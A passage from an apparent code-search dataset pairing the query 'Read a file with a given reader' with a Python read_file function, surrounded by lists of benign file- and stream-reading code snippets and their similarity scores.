get_oanda_currency_historical_rates(\n start, end,\n quote_currency=\"USD\", base_currency=name,\n reversed=True, session=session\n )\n elif data_source == 'nasdaq':\n if name != 'symbols':\n raise ValueError(\"Only the string 'symbols' is supported for \"\n \"Nasdaq, not %r\" % (name,))\n return get_nasdaq_symbols(retry_count=retry_count, pause=pause)\n else:\n msg = \"data_source=%r is not implemented\" % data_source\n raise NotImplementedError(msg)", "def readerForMemory(buffer, size, URL, encoding, options):\n ret = libxml2mod.xmlReaderForMemory(buffer, size, URL, encoding, options)\n if ret is None:raise treeError('xmlReaderForMemory() failed')\n return xmlTextReader(_obj=ret)", "async def next(self) -> Optional[Union[MultipartReader, BodyPartReader]]:\n ...", "async def next(self) -> Optional[Union[MultipartReader, BodyPartReader]]:\n ...", "def read_data(reader: UFOReader, filename: str) -> bytes:\n return reader.readImage(filename) # type: ignore", "def read(self, size: int = None) -> bytes:\n if size is None:\n buffer = io.BytesIO()\n copy_stream(self, buffer)\n return buffer.getvalue()\n else:\n return self._read_chunked(size)", "def read(self, location, **user_options):\n\n # Base the options off a copy to leave the Reader options uneffected.\n options = self.options.copy()\n options.update(user_options)\n\n # The directory option allows users to specify file locations relative\n # to a location other than the present working directory by joining the\n # location with the directory of their choice.\n if options.directory:\n location = os.path.join(options.directory, location)\n\n # When passed a 
directory as the location, the Reader recursively builds\n # a list of replays to return using the utils.get_files function. This\n # function respects the following arguments:\n # * depth: The maximum depth to traverse. Defaults to unlimited (-1)\n # * follow_symlinks: Boolean for following symlinks. Defaults to True\n # * exclude_dirs: A list of directory names to skip while recursing\n # * incldue_regex: A regular expression rule which all returned file\n # names must match. Defaults to None\n #\n replays, files = list(), utils.get_files(location, **options)\n\n # If no files are found, it could be for a variety of reasons\n # raise a NoMatchingFilesError to alert them to the situation\n if not files:\n raise exceptions.NoMatchingFilesError()\n\n for location in files:\n if options.verbose: print \"Reading: %s\" % location\n\n with open(location, 'rb') as replay_file:\n replays.append(self.make_replay(replay_file, **options))\n\n return replays", "def test_file_read_missing_file(self):\n with (self.assertRaises(IOError)):\n FileReader(self.bogus_path).read()", "def load_stream(source):\n raise NotImplementedError(\"not implemented yet\")", "def read(reader: BitStreamReader, _index: int) -> str:\n\n return reader.readString()", "def readerForFd(fd, URL, encoding, options):\n ret = libxml2mod.xmlReaderForFd(fd, URL, encoding, options)\n if ret is None:raise treeError('xmlReaderForFd() failed')\n return xmlTextReader(_obj=ret)", "def reader(client: socket.socket, reader_id: int) -> tuple:\n\n logging.info(\"reader %s connected\", reader_id)\n\n # read all data till the end\n data = b\"\"\n while True:\n chunk = client.recv(1024)\n if not chunk:\n break\n data += chunk\n\n # close client (shutdown shared socket for all processes)\n client.shutdown(socket.SHUT_RDWR)\n client.close()\n\n logging.info(\"reader %s read %s bytes, connection closed\", reader_id, len(data))\n\n # process data\n rsp = ContentProcessor.put(data)\n\n logging.info(\"reader %s data processed %s\", reader_id, rsp)\n\n return (repr(rsp), reader_id)", "def _read(self, string=\"\", fname=\"\"):\n if string:\n self.handle = gv.readstring(string)\n elif fname == \"stdin\":\n data = sys.stdin.read()\n self.handle = gv.readstring(data)\n else:\n self.handle = gv.read(fname)\n # gv returns None if eg. 
the input does not exist\n if not self.handle:\n raise ValueError(\"Error with file \" + fname)", "def _get_reader_fn(self, reader, reader_method=None, path=None) -> Callable:\n if reader_method is None and path is None:\n raise ExecutionEngineError(\n \"Unable to determine spark reader function without reader_method or path\"\n )\n\n if reader_method is None:\n reader_method = self.guess_reader_method_from_path(path=path)\n\n reader_method_op: str = reader_method.lower()\n try:\n if reader_method_op == \"delta\":\n return reader.format(reader_method_op).load\n return getattr(reader, reader_method_op)\n except AttributeError:\n raise ExecutionEngineError(\n f\"Unable to find reader_method {reader_method} in spark.\",\n )", "def readLine(self, default=None):\n raise NotImplementedError()", "def reader(handle, input_queue):\n input_queue.put(handle.read())", "def open_reader(self, **kw):\n return self.table.open_reader(str(self), **kw)", "def _simple_read(filename, converter):\n with open(filename) as file:\n return converter(file.read())", "def test_file_read_bin_missing_file(self):\n with (self.assertRaises(IOError)):\n FileReader(self.bogus_path).read_bin()", "def read_stream(stream_name, input_stream, io_q):\n if not input_stream:\n io_q.put((stream_name, \"EXIT\"))\n return\n for line in input_stream:\n io_q.put((stream_name, line))\n if not input_stream.closed:\n input_stream.close()\n io_q.put((stream_name, \"EXIT\"))", "def open(path, override_extension=None):\n extension = override_extension or os.path.splitext(path)[1][1:]\n return read_stream(builtins.open(path, 'rb'), extension)", "def readinto(self, buf: bytes, /) -> Optional[int]:", "def read_instream(instream):\n # If you need to read a csv, create a DataFrame, or whatever it might be,\n # do it here.\n return instream.read()", "def snappy_read_block(stream, buffer):\n block_len = read_long(stream)\n data = stream.read(block_len)\n # Trim off last 4 bytes which hold the CRC32\n decompressed = snappy.decompress(data[:-4])\n buffer.truncate(0)\n buffer.seek(0)\n buffer.write(decompressed)\n buffer.seek(0)", "def guess_reader_method_from_path(path: str):\n path = path.lower()\n if path.endswith(\".csv\") or path.endswith(\".tsv\"):\n return \"csv\"\n elif (\n path.endswith(\".parquet\") or path.endswith(\".parq\") or path.endswith(\".pqt\")\n ):\n return \"parquet\"\n\n raise ExecutionEngineError(\n f\"Unable to determine reader method from path: {path}\"\n )", "def _handle_reading(self, soc):\n chunk = soc.recv(_RECV_CHUNK_SIZE)\n if not chunk:\n self._handle_error(soc) # unexpected EOF\n return\n if soc not in self._reading:\n self._reading[soc] = \"\"\n self._reading[soc] += chunk.decode(\"utf-8\")\n\n if self._reading[soc].endswith(\"\\r\\n\\r\\n\"):\n # Finished reading request headers, don't expect request body.\n self._log(\"read %r\" % self._reading[soc])\n headers = self._reading[soc]\n self._reading[soc] = \"\"\n\n if not headers.startswith(\"GET \"):\n raise Exception(\"Only GET requests are supported.\")\n self._writing[soc], hook = self._responses[headers.split()[1]]\n\n # Move the socket to list of things waiting to write.\n self._read_list.remove(soc)\n self._write_list.append(soc)\n\n hook(self, soc)", "def read(path, repo=None, rev=None, remote=None, mode=\"r\", encoding=None):\n with open(\n path, repo=repo, rev=rev, remote=remote, mode=mode, encoding=encoding\n ) as fd:\n return fd.read()", "def get_read_parser(format):\n format = format.lower()\n if format == 'bed':\n return BedReadParser\n elif format == 
'bedpe':\n return BedPeReadParser\n elif format == 'sam':\n return SamReadParser\n elif format == 'bam':\n return BamReadParser\n else:\n raise ValueError(f\"unknown read file format: {format!r}\")", "def read(self, path, exception=True):\n f = self._openPath(path, exception=exception)\n if f: self.readObject(path, f)", "def read_file(path, source):\n if source == 'srim':\n return read_srim(path)\n elif source == 'astar':\n return read_astar(path)\n else:\n raise ValueError('Unknown data source {}'.format(source))", "def get_iter(self, reader: DataReader):\n\n if reader is None:\n return None\n\n xs, ys = get_dataset(reader)\n\n return self.prepare_dataset(xs, ys)" ]
[ "0.6057923", "0.6019735", "0.5995071", "0.59576786", "0.5762868", "0.5712855", "0.5576423", "0.544311", "0.54237616", "0.54231197", "0.5403411", "0.53777176", "0.53776944", "0.52933985", "0.5291875", "0.52114725", "0.5191779", "0.5167444", "0.514691", "0.51206833", "0.510413", "0.50981784", "0.50818163", "0.5051923", "0.50517976", "0.503986", "0.50289977", "0.50232327", "0.50008893", "0.48906842", "0.4882231", "0.48818547", "0.48760203", "0.48579478", "0.4855577", "0.48527634", "0.48463434", "0.48335013", "0.48281315", "0.4826273", "0.48165932", "0.4799883", "0.47886893", "0.47691038", "0.4743272", "0.47208753", "0.47083166", "0.4697216", "0.4696926", "0.46849045", "0.46800685", "0.4672618", "0.46710542", "0.4665734", "0.4642792", "0.4638772", "0.46295205", "0.4627178", "0.46206447", "0.46076098", "0.4604761", "0.46009442", "0.45983055", "0.4598074", "0.45825595", "0.4572856", "0.456564", "0.45541283", "0.45522875", "0.45479795", "0.45421654", "0.45394954", "0.45394954", "0.45365945", "0.45363304", "0.45345557", "0.4534513", "0.45316216", "0.45309561", "0.4525862", "0.45247525", "0.45240054", "0.45135203", "0.45095623", "0.4504586", "0.45043823", "0.4499532", "0.44976705", "0.4496618", "0.4495163", "0.44942188", "0.44923657", "0.44892934", "0.44861394", "0.4482171", "0.44803962", "0.44794074", "0.4478571", "0.44782218", "0.4472176" ]
0.6454055
0
Read a file with a given reader
If the reader is not specified, an attempt to guess at an appropriate reader is made.
A NoReaderFound error is raised if no such appropriate reader is found.
def read_file(
    file_path: Union[str, pathlib.Path],
    reader_name: Optional[str] = None,
    **reader_args: Any,
) -> Reader:
    with open(file_path, mode="rb") as input_stream:
        return read_stream(input_stream, reader_name)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def read(filePath, reader='infer'):\n if isinstance(reader, str):\n if reader == 'infer':\n loader = inferReader(filePath)\n else:\n if reader in READERS:\n loader = READERS[reader]\n else:\n raise SerpentToolsException(\n 'Reader type {} not supported'.format(reader)\n )\n else:\n assert callable(reader), (\n 'Reader {} is not callable'.format(str(reader)))\n loader = reader\n returnedFromLoader = loader(filePath)\n returnedFromLoader.read()\n return returnedFromLoader", "def _get_reader(self, filepath: str):\n file_extension = os.path.splitext(filepath)[-1]\n\n self._validate_file(filepath)\n\n if file_extension == \".ipynb\":\n return NotebookReader(filepath)\n elif file_extension in [\".py\", \".r\"]:\n return FileReader(filepath)\n else:\n raise ValueError(f\"File type {file_extension} is not supported.\")", "def inferReader(filePath):\n for reg, reader in six.iteritems(REGEXES):\n match = re.match(reg, filePath)\n if match and match.group() == filePath:\n debug('Inferred reader for {}: {}'\n .format(filePath, reader.__name__))\n return reader\n raise SerpentToolsException(\n 'Failed to infer filetype and thus accurate reader from'\n 'file path {}'.format(filePath)\n )", "def get_reader(fn):\n if is_bed(fn):\n return BedReader(fn)\n elif is_vcf(fn):\n return VcfReader(fn)\n else:\n raise ValueError(\"Could not get reader for %s\" % fn)", "def get_file_reader(path):\n return get_by_scheme(path, SCHEMAS_TO_FILEREADERS, LocalFileReader)", "def read(filename, file_format=None, **kwargs):\n if not isinstance(filename, str):\n raise TypeError()\n if not (file_format is None or file_format in {\"tough\", \"json\"}):\n raise ValueError()\n\n fmt = (\n file_format\n if file_format\n else filetype_from_filename(filename, _extension_to_filetype)\n )\n fmt = fmt if fmt else \"tough\"\n\n return _reader_map[fmt](filename, **kwargs)", "def test_from_reader_both_given(self):\n pandoc_default_files = [\n os.path.join(\n TEST_DEFAULT_FILES_PATH, \"from_reader_both_given.yaml\"\n )\n ]\n\n settings = get_settings(PANDOC_DEFAULT_FILES=pandoc_default_files)\n\n pandoc_reader = PandocReader(settings)\n source_path = os.path.join(TEST_CONTENT_PATH, \"valid_content.md\")\n\n with self.assertRaises(ValueError) as context_manager:\n pandoc_reader.read(source_path)\n\n message = str(context_manager.exception)\n self.assertEqual(\n (\n \"Specifying both from and reader is not supported.\"\n \" Please specify just one.\"\n ),\n message,\n )", "def get_reader(reader_type):\n return reader_dict.get(reader_type, None)", "def readerForFile(filename, encoding, options):\n ret = libxml2mod.xmlReaderForFile(filename, encoding, options)\n if ret is None:raise treeError('xmlReaderForFile() failed')\n return xmlTextReader(_obj=ret)", "def reader_from_file(load_dir: str, **kwargs):\n shared_resources = create_shared_resources()\n shared_resources.load(os.path.join(load_dir, \"shared_resources\"))\n if kwargs:\n shared_resources.config.update(kwargs)\n reader = readers[shared_resources.config[\"reader\"]](shared_resources)\n reader.load_and_setup_modules(load_dir)\n return reader", "def _resolve_reader(self):\n self.fh = self.path.fs.open(self.path, 'rU')\n self.resolved = csv.reader(self.fh, delimiter=self.delimiter)", "def read(self, location, **user_options):\n\n # Base the options off a copy to leave the Reader options uneffected.\n options = self.options.copy()\n options.update(user_options)\n\n # The directory option allows users to specify file locations relative\n # to a location other than the present working 
directory by joining the\n # location with the directory of their choice.\n if options.directory:\n location = os.path.join(options.directory, location)\n\n # When passed a directory as the location, the Reader recursively builds\n # a list of replays to return using the utils.get_files function. This\n # function respects the following arguments:\n # * depth: The maximum depth to traverse. Defaults to unlimited (-1)\n # * follow_symlinks: Boolean for following symlinks. Defaults to True\n # * exclude_dirs: A list of directory names to skip while recursing\n # * incldue_regex: A regular expression rule which all returned file\n # names must match. Defaults to None\n #\n replays, files = list(), utils.get_files(location, **options)\n\n # If no files are found, it could be for a variety of reasons\n # raise a NoMatchingFilesError to alert them to the situation\n if not files:\n raise exceptions.NoMatchingFilesError()\n\n for location in files:\n if options.verbose: print \"Reading: %s\" % location\n\n with open(location, 'rb') as replay_file:\n replays.append(self.make_replay(replay_file, **options))\n\n return replays", "def _read_file(self, options, datas):\n self.ensure_one()\n # guess mimetype from file content\n mimetype = guess_mimetype(datas)\n (file_extension, handler, req) = FILE_TYPE_DICT.get(mimetype, (None, None, None))\n if handler:\n try:\n return getattr(self, '_read_' + file_extension)(options, datas)\n except Exception:\n _logger.warn(\"Failed to read file '%s' (transient id %d) using guessed mimetype %s\", self.datas_fname or '<unknown>', self.id, mimetype)\n # try reading with user-provided mimetype\n (file_extension, handler, req) = FILE_TYPE_DICT.get(self.type, (None, None, None))\n if handler:\n try:\n return getattr(self, '_read_' + file_extension)(options, datas)\n except Exception:\n _logger.warn(\"Failed to read file '%s' (transient id %d) using user-provided mimetype %s\", self.datas_fname or '<unknown>', self.id, self.type)\n # fallback on file extensions as mime types can be unreliable (e.g.\n # software setting incorrect mime types, or non-installed software\n # leading to browser not sending mime types)\n if self.datas_fname:\n p, ext = os.path.splitext(self.datas_fname)\n if ext in EXTENSIONS:\n try:\n return getattr(self, '_read_' + ext[1:])(options, datas)\n except Exception:\n _logger.warn(\"Failed to read file '%s' (transient id %s) using file extension\", self.datas_fname, self.id)\n if req:\n raise ImportError(_(\"Unable to load \\\"{extension}\\\" file: requires Python module \\\"{modname}\\\"\").format(extension=file_extension, modname=req))\n raise ValueError(_(\"Unsupported file format \\\"{}\\\", import only supports CSV, ODS, XLS and XLSX\").format(self.type))", "def _file_read(fname):\n if not os.path.exists(fname):\n parser.error(\"File '{0}' not found.\".format(fname))\n return open(fname, 'r')", "def test_file_read_missing_file(self):\n with (self.assertRaises(IOError)):\n FileReader(self.bogus_path).read()", "def readFile(subdir, name, errorOnNonexistent=False, default=None):\n\n fname = _getFilename(subdir, name)\n # Note: this would probably look more natural as:\n # if not os.path.exists(fname):\n # # ... file does not exist ...\n # else:\n # try:\n # with open(fname) as f:\n # # ... read file ...\n # except:\n # # ... assume file was malformed ...\n # but there's technically a race condition in the above: the file could be\n # removed after the os.path.exists() check and before the open(fname). 
This\n # isn't going to matter in practice, but on principle I've coded it in a\n # different way which I _think_ avoids that race condition.\n #\n # Technically fileExists is really more like \"file is a regular file and we\n # have permission to read it\", but the point is that if we can't read it\n # and errorOnNonexistent is False, then we want to return the default value\n # rather than error.\n fileExists = False\n try:\n with open(fname, \"r\") as f:\n fileExists = True\n return json.load(f)\n except:\n if not fileExists and not errorOnNonexistent:\n return default\n else:\n raise", "def read(self, args):\n assert self.exists(args=args)\n file_path = self.path(args)\n file_str = autofile.read_file(file_path)\n file_dat = self.reader_(file_str)\n assert self.checker_(file_dat)\n return file_dat", "def load_input_reader(input_params):\n if \"abstract\" in input_params:\n driver_name = input_params[\"abstract\"][\"format\"]\n elif \"path\" in input_params:\n input_file = input_params[\"path\"]\n driver_name = driver_from_file(input_file)\n else:\n raise errors.MapcheteDriverError(\n \"invalid input parameters %s\" % input_params)\n if driver_name not in available_input_formats():\n raise errors.MapcheteDriverError(\n \"driver %s not found in %s\" % (\n driver_name, available_input_formats())\n )\n for v in pkg_resources.iter_entry_points(_DRIVERS_ENTRY_POINT):\n try:\n # instanciate dummy input reader to read metadata\n input_reader = v.load().InputData.__new__(\n v.load().InputData, input_params)\n if input_reader.METADATA[\"driver_name\"] == driver_name:\n return v.load().InputData(input_params)\n except (AttributeError, errors.MapcheteConfigError):\n pass\n raise errors.MapcheteDriverError(\n \"no loader for driver '%s' could be found.\" % driver_name)", "def load_reader(path):\n if path[-4:] != '.pkl':\n path+='.pkl'\n with open(path,\"r+b\") as f:\n log(\"Loading reader from {}\".format(path))\n r = pickle.load(f)\n return r", "def _get_reader_fn(self, reader, reader_method=None, path=None) -> Callable:\n if reader_method is None and path is None:\n raise ExecutionEngineError(\n \"Unable to determine spark reader function without reader_method or path\"\n )\n\n if reader_method is None:\n reader_method = self.guess_reader_method_from_path(path=path)\n\n reader_method_op: str = reader_method.lower()\n try:\n if reader_method_op == \"delta\":\n return reader.format(reader_method_op).load\n return getattr(reader, reader_method_op)\n except AttributeError:\n raise ExecutionEngineError(\n f\"Unable to find reader_method {reader_method} in spark.\",\n )", "def get_reader_fn(input_fp=None):\n if input_fp is None:\n return OdpsTableReader if \"PAI\" in tf.__version__ else CSVReader\n\n if \"odps://\" in input_fp:\n return OdpsTableReader\n else:\n return CSVReader", "def legacy_get_reader(self, **kwargs):\n\n # Note: this will break thread-safety\n self._request._kwargs = kwargs\n\n # safeguard for DICOM plugin reading from folders\n try:\n assert Path(self._request.filename).is_dir()\n except OSError:\n pass # not a valid path on this OS\n except AssertionError:\n pass # not a folder\n else:\n return self._format.get_reader(self._request)\n\n self._request.get_file().seek(0)\n return self._format.get_reader(self._request)", "def guess_reader_method_from_path(path: str):\n path = path.lower()\n if path.endswith(\".csv\") or path.endswith(\".tsv\"):\n return \"csv\"\n elif (\n path.endswith(\".parquet\") or path.endswith(\".parq\") or path.endswith(\".pqt\")\n ):\n return \"parquet\"\n\n 
raise ExecutionEngineError(\n f\"Unable to determine reader method from path: {path}\"\n )", "def _read_file(file_name):\n file_handle = file(file_name)\n try:\n return file_handle.read()\n finally:\n file_handle.close()", "def get_reader(fname):\n\n if fname == \"-\":\n fh = sys.stdin\n else:\n fh = open(fname, \"r\")\n \n rdr = csv.reader(fh, dialect=\"psv\")\n return (rdr, fh)", "def read(self, file_name):\n msg = \"ReaderWriterBase::read called!\"\n raise NotImplementedError(msg)", "def read_file(path, source):\n if source == 'srim':\n return read_srim(path)\n elif source == 'astar':\n return read_astar(path)\n else:\n raise ValueError('Unknown data source {}'.format(source))", "def read_file(self) -> misc_.file_readers.FileReaderHandler:\n\t\treturn self._read_file", "def readFromFile(filename):\n raise NotImplementedError", "def read(self, filename=None):\n\t\tif filename is None:\n\t\t\tif hasattr(self, 'filename'):\n\t\t\t\tfilename = os.path.join(self.path, self.filename)\n\t\t\telse:\n\t\t\t\traise Exception, 'no filename given!'\n\t\tif os.path.splitext(filename)[1] in self.extensions and os.path.exists(filename):\n\t\t\tfor line in open(filename).readlines():\n\t\t\t\tself.read_line(line)", "def CaseReader(filename):\n\n try:\n reader = SqliteCaseReader(filename)\n return reader\n except IOError:\n # filename not a valid Sqlite database file\n pass\n\n try:\n reader = HDF5CaseReader(filename)\n return reader\n except IOError:\n raise IOError('Unable to load cases from file {0}'.format(filename))", "def test_fast_reader():\n text = \"a b c\\n1 2 3\\n4 5 6\"\n with pytest.raises(ParameterError): # C reader can't handle regex comment\n ascii.read(text, format=\"fast_basic\", guess=False, comment=\"##\")\n\n # Enable multiprocessing and the fast converter\n try:\n ascii.read(\n text,\n format=\"basic\",\n guess=False,\n fast_reader={\"parallel\": True, \"use_fast_converter\": True},\n )\n except NotImplementedError:\n # Might get this on Windows, try without parallel...\n if os.name == \"nt\":\n ascii.read(\n text,\n format=\"basic\",\n guess=False,\n fast_reader={\"parallel\": False, \"use_fast_converter\": True},\n )\n else:\n raise\n\n # Should raise an error if fast_reader has an invalid key\n with pytest.raises(FastOptionsError):\n ascii.read(text, format=\"fast_basic\", guess=False, fast_reader={\"foo\": True})\n\n # Use the slow reader instead\n ascii.read(text, format=\"basic\", guess=False, comment=\"##\", fast_reader=False)\n # Will try the slow reader afterwards by default\n ascii.read(text, format=\"basic\", guess=False, comment=\"##\")", "def test_file_readas_missing_file(self):\n with (self.assertRaises(IOError)):\n FileReader(self.bogus_path).read_as(\"utf-8\")", "def read_stream(\n input_stream: IO[bytes], reader_name: Optional[str] = None, **reader_args: Any\n) -> Reader:\n if reader_name is None:\n reader_name = identify(input_stream)\n\n reader = plugins.call(\n package_name=__name__,\n plugin_name=reader_name,\n input_stream=input_stream,\n **reader_args,\n )\n reader.read()\n return reader", "def test_file_readlines_missing_file(self):\n with (self.assertRaises(IOError)):\n FileReader(self.bogus_path).readlines()", "def read_from_file(self, filename, encoding=\"utf-8\", compat_mode=False):\n # Nesting level is only ever set here and `read_from_string`, nowhere else as of now.\n self.encoding = encoding\n if compat_mode:\n self.compat_mode = compat_mode\n with contextlib.closing(get_textfile_stream(filename, encoding)) as stream:\n return 
self.read_from_readline_interface(stream.readline, filename, compat_mode=compat_mode)", "def read_on(reader, f):\n while True:\n try:\n line = reader(f)\n except StopIteration:\n break\n\n if line is not None:\n yield line", "def _get_infile(filepath):\n # type: (Text) -> BinaryIO\n if filepath is None:\n return sys.stdin\n else:\n if not os.path.exists(filepath):\n raise OSError('File does not exist: {}'.format(filepath))\n return open(filepath, 'r')", "def get_read_parser(format):\n format = format.lower()\n if format == 'bed':\n return BedReadParser\n elif format == 'bedpe':\n return BedPeReadParser\n elif format == 'sam':\n return SamReadParser\n elif format == 'bam':\n return BamReadParser\n else:\n raise ValueError(f\"unknown read file format: {format!r}\")", "def read_file(self, *args, **kwargs):\n if self.detector == \"FACET\":\n return self.read_facet(self.filename)\n elif self.detector == \"OpenFace\":\n return self.read_openface(self.filename)\n elif self.detector == \"Affectiva\":\n return self.read_affectiva(self.filename)\n elif self.detector == \"Feat\":\n return self.read_feat(self.filename)\n else:\n print(\"Must specifiy which detector [Feat, FACET, OpenFace, or Affectiva]\")", "def __init__(self, filename='', use_cython=True, raw=None):\n \n if raw and not filename:\n # Load raw data exterinally\n self.raw = raw\n return\n \n # Defaults to cython reader if user selects it\n if use_cython and cython_loaded:\n self.raw = _reader.Read(filename)\n\n # Python reader for debug purposes\n else:\n self.raw = PythonReader.Read(filename)", "def _simple_read(filename, converter):\n with open(filename) as file:\n return converter(file.read())", "def read_image(fname, roi=None, dset_name='default', parallelism=1):\n\n from functools import partial\n from numpy import array, ndarray\n from multiprocessing import Pool, cpu_count\n\n if isinstance(fname, str):\n fmt = fname.split('.')[-1]\n \n if fmt == '.h5' or fmt == '.hdf5':\n reader = partial(readers[fmt], roi=roi, dset_name=dset_name)\n else:\n reader = partial(readers[fmt], roi=roi)\n \n result = reader(fname)\n\n elif isinstance(fname, (tuple, list, ndarray)):\n fmt = fname[0].split('.')[-1]\n if fmt == '.h5' or fmt == '.hdf5':\n reader = partial(readers[fmt], roi=roi, dset_name=dset_name)\n else:\n reader = partial(readers[fmt], roi=roi)\n\n if parallelism == 1:\n result = array([reader(f) for f in fname])\n\n else:\n if parallelism == -1:\n num_cores = cpu_count()\n else:\n num_cores = min(parallelism, cpu_count())\n\n with Pool(num_cores) as pool:\n result = array(pool.map(reader, fname))\n else:\n raise TypeError(\n \"First argument must be string for a one file or (tuple, list, ndarray) for many files\"\n )\n\n return result", "def open_file(file_name):\n\n try:\n return open(file_name, 'rt')\n except Exception as e:\n raise UserException(\"unable to open file {0}\".format(file_name),\n str(e))", "def open_file(filename=\"default.txt\", filepath=\"default_path\"):\n\n if filepath == \"default_path\":\n filepath = \"\"\n\n try:\n fp = open(filepath + filename, \"r+\") # Opens file for reading and writing\n return fp\n except IOError:\n l.error(str(filepath + filename) + \" is not an existing file.\")", "def fit_reader(self, reader):\n return self.fit(line for (_, line) in reader.readsents(silent=False))", "def read(self, source, sourcename=None, postcheck=True, strict=True):\n if isinstance(source, str):\n with open(source, mode=\"r\") as stream:\n return self.readTextStream(\n stream,\n sourcename or source,\n 
postcheck=postcheck,\n strict=strict,\n )\n elif isinstance(source, pathlib.Path):\n with source.open(mode=\"r\") as stream:\n return self.readTextStream(\n stream,\n sourcename or str(source),\n postcheck=postcheck,\n strict=strict,\n )\n elif isinstance(source, io.BufferedIOBase):\n return self.readTextStream(\n io.TextIOWrapper(source),\n sourcename,\n postcheck=postcheck,\n strict=strict,\n )\n elif not isinstance(source, io.TextIOBase):\n raise TypeError(\n \"Source must be file name (str or pathlib.Path) or \"\n \"readable stream of text data. Got {}\".format(type(source))\n )\n return self.readTextStream(\n source, sourcename, postcheck=postcheck, strict=strict\n )", "def readFile( *args ):\n filePath = path.join( *args )\n if not path.exists( filePath ):\n return None\n with open( filePath, 'r' ) as fd:\n return fd.read()", "def open_reader(self, **kw):\n return self.table.open_reader(str(self), **kw)", "def validate_file(\n file: str,\n format: FormatType = FormatType.csv,\n delimiter: str = ',',\n header_delimiter: str = None,\n skip_blank_lines: bool = True,\n):\n\n with open_resource(file) as resource_io:\n\n if format == FormatType.csv:\n reader = CSVReader(\n resource_io,\n delimiter=delimiter,\n header_delimiter=header_delimiter,\n skip_blank_lines=skip_blank_lines,\n )\n elif format == FormatType.jsonl:\n reader = JSONLReader(resource_io)\n elif format == FormatType.json:\n reader = JSONReader(resource_io)\n else:\n raise ValueError\n\n for _ in reader:\n pass", "def my_reader(filename, sheetname='Sheet1', separ=','):\r\n global df_read\r\n filename_list = filename.split('.')\r\n extension = filename_list[-1]\r\n if extension == 'csv':\r\n df_read = pd.read_csv(filename, sep=separ)\r\n if extension == 'data':\r\n df_read = pd.read_csv(filename, sep=separ, header=None)\r\n if extension == 'txt':\r\n df_read = pd.read_csv(filename, sep=separ)\r\n if extension == 'json':\r\n df_read = pd.read_json(filename)\r\n if extension == 'html':\r\n df_read = pd.read_html(filename)\r\n if extension == 'xls':\r\n df_read = pd.read_excel(pd.ExcelFile(filename), sheetname)\r\n if extension == 'xlsx':\r\n df_read = pd.read_excel(pd.ExcelFile(filename), sheetname)\r\n if extension == 'feather':\r\n df_read = pd.read_feather(filename)\r\n if extension == 'parquet':\r\n df_read = pd.read_parquet(filename)\r\n if extension == 'msg':\r\n df_read = pd.read_msgpack(filename)\r\n if extension == 'dta':\r\n df_read = pd.read_stata(filename)\r\n if extension == 'sas7bdat':\r\n df_read = pd.read_sas(filename)\r\n if extension == 'pkl':\r\n df_read = pd.read_pickle(filename)\r\n return df_read", "def rnn_reader(file_path, word_dict, is_infer):\n\n def reader():\n with open(file_path) as f:\n for line_id, line in enumerate(f):\n yield record_reader(line, word_dict, is_infer)\n\n return reader", "def reader(name, version=None, mimetype=None):\n\treturn _data_processor('read', name, version, mimetype)", "def test_read_raw_suggested(fname):\n with pytest.raises(ValueError, match='Try reading'):\n read_raw(fname)", "def read(self, filename=None, **kwargs):\n if filename:\n self.filename = filename\n if not self.filename:\n raise Exception('No filename provided')\n if not os.path.isfile(self.filename):\n raise OSError(2,'File not found:',self.filename)\n if os.stat(self.filename).st_size == 0:\n raise EmptyFileError('File is empty:',self.filename)\n # Calling children function\n self._read(**kwargs)", "def readerForFd(fd, URL, encoding, options):\n ret = libxml2mod.xmlReaderForFd(fd, URL, encoding, options)\n 
if ret is None:raise treeError('xmlReaderForFd() failed')\n return xmlTextReader(_obj=ret)", "def read(self, filename=None, **kwargs):\r\n if filename:\r\n self.filename = filename\r\n if not self.filename:\r\n raise Exception('No filename provided')\r\n if not os.path.isfile(self.filename):\r\n raise OSError(2,'File not found:',self.filename)\r\n if os.stat(self.filename).st_size == 0:\r\n raise EmptyFileError('File is empty:',self.filename)\r\n # Calling children function\r\n self._read(**kwargs)", "def read(*rnames):\n with open(os.path.join(os.path.dirname(__file__), *rnames)) as f:\n return f.read()", "def read(self, path, exception=True):\n f = self._openPath(path, exception=exception)\n if f: self.readObject(path, f)", "def txt_file_reader(path):\n return open(path, encoding=cfg.ENCODING)", "def read_file(string_object):\n try:\n return open(string_object,\"r\")\n except FileNotFoundError:\n return None", "def read_or_default(self, default: str):\n if os.path.isfile(self._path):\n return self.read()\n return default", "def load_data_reader(data_reader=\"SpreadsheetDataReader\"):\n return importlib.import_module('c302.%s'%data_reader)", "def job_reader(path) -> Generator[ParsedActionType, None, None]:\n try:\n with open(path, \"r\") as f:\n parser = Parser()\n for line in f:\n result = parser.process_line(line)\n if result is not None:\n yield result\n except IOError as err:\n print(\"Error opening/reading from file '{0}': {1}\"\n .format(err.filename, err.strerror))", "def _open_file(path):\n\n if 'None.txt' in path:\n return None\n try:\n with open(path, 'r', encoding='utf-8') as file:\n return file.read().strip()\n except UnicodeDecodeError:\n try:\n with open(path, 'rb') as file:\n return file.read().strip()\n except OSError:\n logging.error(FileNotFoundError(f'Cant open {path}'))", "def _get_reader_class(basename: str) -> Type[BaseEEGReader]:\n if basename.endswith(\".h5\"):\n return RamulatorHDF5Reader\n elif basename.endswith((\".bdf\", \".mff\", \".raw\")):\n return ScalpEEGReader\n elif basename.endswith(\".npy\"):\n return NumpyEEGReader\n else:\n return SplitEEGReader", "def read(*names, **kwargs):\n with io.open(\n os.path.join(os.path.dirname(__file__), *names),\n encoding=kwargs.get(\"encoding\", \"utf8\"),\n ) as fp:\n return fp.read()", "def read_file(filename):\r\n if Py3:\r\n return open(filename, \"r\", newline='')\r\n return open(filename, \"rb\")", "def test_read_raw_unsupported_single(fname):\n with pytest.raises(ValueError, match='Unsupported file type'):\n read_raw(fname)", "def readFile(filename, print_error=True):\n try:\n fp = open(filename)\n try:\n return fp.read()\n finally:\n fp.close()\n except IOError:\n if print_error:\n print('Error reading %s: %s' % (filename, sys.exc_info()[1]))\n return None", "def reader(path: str) -> Tuple[List[str], str]:\n\n if not os.path.isfile(path):\n return None, \"No file %s found\", path\n\n with open(path, 'r') as f:\n try:\n return json.load(f), None\n\n except Exception as ex:\n return None, ex", "def read(self, filename):\n raise NotImplementedError", "def read_file(self, file_path: str, inner_separator: str = None, outer_separator: str = None,\n query_format: QueryFormat = QueryFormat.CROSS_PRODUCT) -> Tuple[Dict, str, str, str]:\n\n if not file_path:\n raise ValueError(\"No file_path was given!\")\n\n if not os.path.isfile(file_path):\n raise 